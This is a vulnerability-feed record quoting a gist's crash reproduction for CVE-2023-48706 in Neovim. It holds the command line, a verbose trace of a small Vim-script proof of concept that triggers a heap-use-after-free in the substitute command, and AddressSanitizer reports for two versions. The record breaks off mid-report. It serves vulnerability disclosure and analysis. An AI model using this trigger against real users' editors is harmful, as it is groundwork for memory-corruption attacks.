{"uuid": "68f7c78b-5751-43b4-a03c-6663a20e4fe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48706", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/6067ed1ca2a2492793f7e001d36dd0f9", "content": "Command:\n./nvim-0.9.5 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nExecuting:     aunmenu *\n\nExecuting:     vnoremenu PopUp.Cut                     \"+x\n\nExecuting:     vnoremenu PopUp.Copy                    \"+y\n\nExecuting:     anoremenu PopUp.Paste                   \"+gP\n\nExecuting:     vnoremenu PopUp.Paste                   \"+P\n\nExecuting:     vnoremenu PopUp.Delete                  \"_x\n\nExecuting:     nnoremenu PopUp.Select\\ All             ggVG\n\nExecuting:     vnoremenu PopUp.Select\\ 
All             gg0oG$\n\nExecuting:     inoremenu PopUp.Select\\ All             VG\n\nExecuting:     anoremenu PopUp.-1-                     \n\nExecuting:     anoremenu PopUp.How-to\\ disable\\ mouse  help disable-mouse\n\nExecuting:   \n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1: func Test_aaaa_substitute_expr_recursive_special()\n\nline 19: \n\nline 20: call Test_aaaa_substitute_expr_recursive_special()\n\ncalling Test_aaaa_substitute_expr_recursive_special()\n\nline 1:   func R()\n\nline 5:   new Xfoobar_UAF\n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nline 5: unlet! b:keymap_name\n\nline 6:   put ='abcdef'\n\nline 7:   let bufnr = bufnr('%')\n\nline 8:   try\n\nline 9:     silent! 
:s/./~\\=R()/0\n\nline 10:     \"call assert_fails(':s/./~\\=R()/0', 'E939:')\n\nline 11:     let @/='.'\n\nline 12:     ~g\n\ncalling R()\n\nline 1:     \" FIXME: leaving out the 'n' flag leaks memory, why?\n\nline 2:     %s/./\\='.'/gn\n\n6 matches on 1 line\nR returning #0\n\ncontinuing in Test_aaaa_substitute_expr_recursive_special\n=================================================================\n==25534==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000071f5 at pc 0x00000072d4cb bp 0x7ffc4943b720 sp 0x7ffc4943b718\nREAD of size 1 at 0x6020000071f5 thread T0\n    #0 0x72d4ca in skipwhite /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1218:24\n    #1 0x948f4e in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:510:10\n    #2 0x8713a1 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2193:13\n    #3 0x869b68 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3000:15\n    #4 0x867dae in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2742:7\n    #5 0x866bc6 in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2597:7\n    #6 0x865f50 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2467:7\n    #7 0x8658b7 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2399:7\n    #8 0x83a1d7 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2342:7\n    #9 0x830e8c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2280:7\n    #10 0x82f4ff in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2236:9\n    #11 0x831611 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:871:7\n    #12 0xeb3eca in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1824:31\n    #13 0xeb6431 in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1696:16\n    #14 0x9b92c3 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3902:20\n    #15 0x9b311a in ex_substitute 
/home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n    #16 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #17 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #18 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #19 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n    #20 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n    #21 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n    #22 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n    #23 0x9656e3 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3074:9\n    #24 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #25 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #26 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #27 0xf4bc61 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n    #28 0xf48a84 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n    #29 0xf487e0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n    #30 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #31 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #32 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #33 0x9d0d63 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n    #34 0x51fb24 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n    #35 0x512a9c in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n    #36 0x7f928d377082 in __libc_start_main 
/build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #37 0x467f7d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x467f7d)\n\n0x6020000071f5 is located 5 bytes inside of 7-byte region [0x6020000071f0,0x6020000071f7)\nfreed by thread T0 here:\n    #0 0x4e043d in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x4e043d)\n    #1 0xca29a9 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:134:3\n    #2 0x9b0bcb in sub_set_replacement /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3081:3\n    #3 0x9b471a in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3387:7\n    #4 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n    #5 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #6 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #7 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #8 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n    #9 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n    #10 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n    #11 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n    #12 0x8713a1 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2193:13\n    #13 0x869b68 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3000:15\n    #14 0x867dae in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2742:7\n    #15 0x866bc6 in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2597:7\n    #16 0x865f50 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2467:7\n    #17 0x8658b7 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2399:7\n    #18 0x83a1d7 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2342:7\n    #19 0x830e8c in 
eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2280:7\n    #20 0x82f4ff in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2236:9\n    #21 0x831611 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:871:7\n    #22 0xeb3eca in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1824:31\n    #23 0xeb6431 in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1696:16\n    #24 0x9b92c3 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3902:20\n    #25 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n    #26 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #27 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #28 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #29 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n\npreviously allocated by thread T0 here:\n    #0 0x4e06bd in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x4e06bd)\n    #1 0xca2787 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:88:15\n    #2 0xca2954 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:15\n    #3 0xca2ba1 in xmallocz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:194:15\n    #4 0xca2c18 in xmemdupz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:212:17\n    #5 0xca336b in xstrdup /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:431:10\n    #6 0x9b4624 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3388:16\n    #7 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n    #8 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #9 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #10 0x9cd6ce in do_cmdline 
/home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #11 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n    #12 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n    #13 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n    #14 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n    #15 0x9656e3 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3074:9\n    #16 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #17 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #18 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #19 0xf4bc61 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n    #20 0xf48a84 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n    #21 0xf487e0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n    #22 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #23 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #24 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #25 0x9d0d63 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n    #26 0x51fb24 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n    #27 0x512a9c in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n    #28 0x7f928d377082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1218:24 in skipwhite\nShadow bytes around the buggy address:\n  0x0c047fff8de0: fa fa 05 fa fa fa 01 fa fa fa 01 fa fa 
fa fd fd\n  0x0c047fff8df0: fa fa 05 fa fa fa 01 fa fa fa fd fa fa fa fd fd\n  0x0c047fff8e00: fa fa 00 01 fa fa fd fd fa fa fd fa fa fa fd fa\n  0x0c047fff8e10: fa fa fd fa fa fa 01 fa fa fa 00 fa fa fa 01 fa\n  0x0c047fff8e20: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\n=>0x0c047fff8e30: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa[fd]fa\n  0x0c047fff8e40: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 02 fa\n  0x0c047fff8e50: fa fa 07 fa fa fa fd fd fa fa 00 00 fa fa fd fa\n  0x0c047fff8e60: fa fa fd fa fa fa 02 fa fa fa 06 fa fa fa 07 fa\n  0x0c047fff8e70: fa fa 02 fa fa fa fd fa fa fa fd fd fa fa 00 02\n  0x0c047fff8e80: fa fa 06 fa fa fa 02 fa fa fa 02 fa fa fa fd fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07 \n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n  Shadow gap:              cc\n==25534==ABORTING\n\n\nCommand:\n./nvim-0.6.1 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nExecuting: augroup nvim_terminal\n\nExecuting: autocmd BufReadCmd term://* ++nested if !exists('b:term_title')|call termopen(matchstr(expand(\"\"), '\\c\\mterm://\\%(.\\{-}//\\%(\\d\\+:\\)\\?\\)\\?\\zs.*'), {'cwd': expand(get(matchlist(expand(\"\"), '\\c\\mterm://\\(.\\{-}\\)//'), 1, ''))})|endif\n\nExecuting: augroup END\n\nExecuting: augroup nvim_cmdwin\n\nExecuting: autocmd! 
CmdwinEnter [:>] syntax sync minlines=1 maxlines=1\n\nExecuting: augroup END\n\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1: func Test_aaaa_substitute_expr_recursive_special()\n\nline 19: \n\nline 20: call Test_aaaa_substitute_expr_recursive_special()\n\ncalling function Test_aaaa_substitute_expr_recursive_special()\n\nline 1:   func R()\n\nline 5:   new Xfoobar_UAF\n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nline 5: unlet! b:keymap_name\n\nline 6:   put ='abcdef'\n\nline 7:   let bufnr = bufnr('%')\n\nline 8:   try\n\nline 9:     silent! :s/./~\\=R()/0\n\nline 10:     \"call assert_fails(':s/./~\\=R()/0', 'E939:')\n\nline 11:     let @/='.'\n\nline 12:     ~g\n\ncalling function Test_aaaa_substitute_expr_recursive_special[12]..R()\n\nline 1:     \" FIXME: leaving out the 'n' flag leaks memory, why?\n\nline 2:     %s/./\\='.'/gn\n\n6 matches on 1 line\nfunction Test_aaaa_substitute_expr_recursive_special[12]..R returning #0\n\ncontinuing in function Test_aaaa_substitute_expr_recursive_special\n=================================================================\n==25706==ERROR: AddressSanitizer: heap-use-after-free on address 0x60200003b1f5 at pc 0x000000470b79 bp 0x7ffcce6c53f0 sp 0x7ffcce6c4bb0\nREAD of size 1 at 0x60200003b1f5 thread T0\n    #0 0x470b78 in strlen (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x470b78)\n    #1 0x6c03ef in skipwhite /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1163:27\n    #2 0x86ce1e in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:474:10\n    #3 0x7a5514 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3304:13\n    #4 0x79fd76 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:4232:15\n    #5 0x79cffe in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3903:7\n    #6 0x79b97c in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3728:7\n    #7 
0x79ad00 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3622:7\n    #8 0x79a667 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3541:7\n    #9 0x761687 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3470:7\n    #10 0x75129c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3394:7\n    #11 0x74fb43 in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3351:9\n    #12 0x751a11 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:852:7\n    #13 0xd37965 in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6769:23\n    #14 0xd3998a in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6662:16\n    #15 0x8cb552 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4058:20\n    #16 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n    #17 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #18 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #19 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n    #20 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n    #21 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n    #22 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n    #23 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #24 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #25 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n    #26 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n    #27 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n    #28 0x901cb0 in do_one_cmd 
/home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #29 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #30 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n    #31 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n    #32 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n    #33 0x7f5d9e663082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #34 0x45df4d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x45df4d)\n\n0x60200003b1f5 is located 5 bytes inside of 7-byte region [0x60200003b1f0,0x60200003b1f7)\nfreed by thread T0 here:\n    #0 0x4d640d in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x4d640d)\n    #1 0xb5f304 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:3\n    #2 0x8b814b in sub_set_replacement /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3260:3\n    #3 0x8c7356 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3546:7\n    #4 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n    #5 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #6 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #7 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n    #8 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n    #9 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n    #10 0x7a5514 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3304:13\n    #11 0x79fd76 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:4232:15\n    #12 0x79cffe in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3903:7\n    #13 0x79b97c in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3728:7\n    #14 
0x79ad00 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3622:7\n    #15 0x79a667 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3541:7\n    #16 0x761687 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3470:7\n    #17 0x75129c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3394:7\n    #18 0x74fb43 in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3351:9\n    #19 0x751a11 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:852:7\n    #20 0xd37965 in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6769:23\n    #21 0xd3998a in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6662:16\n    #22 0x8cb552 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4058:20\n    #23 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n    #24 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #25 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #26 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n    #27 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n    #28 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n    #29 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n\npreviously allocated by thread T0 here:\n    #0 0x4d668d in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x4d668d)\n    #1 0xb5f062 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:74:15\n    #2 0xb5f224 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:108:15\n    #3 0xb5f66d in xmallocz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:187:15\n    #4 0xb5f6e8 in xmemdupz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:205:17\n    #5 0xb5fe3b in xstrdup 
/home/zzw/Desktop/neovim/build/../src/nvim/memory.c:424:10\n    #6 0x8c7260 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3547:16\n    #7 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n    #8 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #9 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #10 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n    #11 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n    #12 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n    #13 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n    #14 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #15 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #16 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n    #17 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n    #18 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n    #19 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #20 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #21 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n    #22 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n    #23 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n    #24 0x7f5d9e663082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x470b78) in strlen\nShadow bytes around the buggy address:\n  
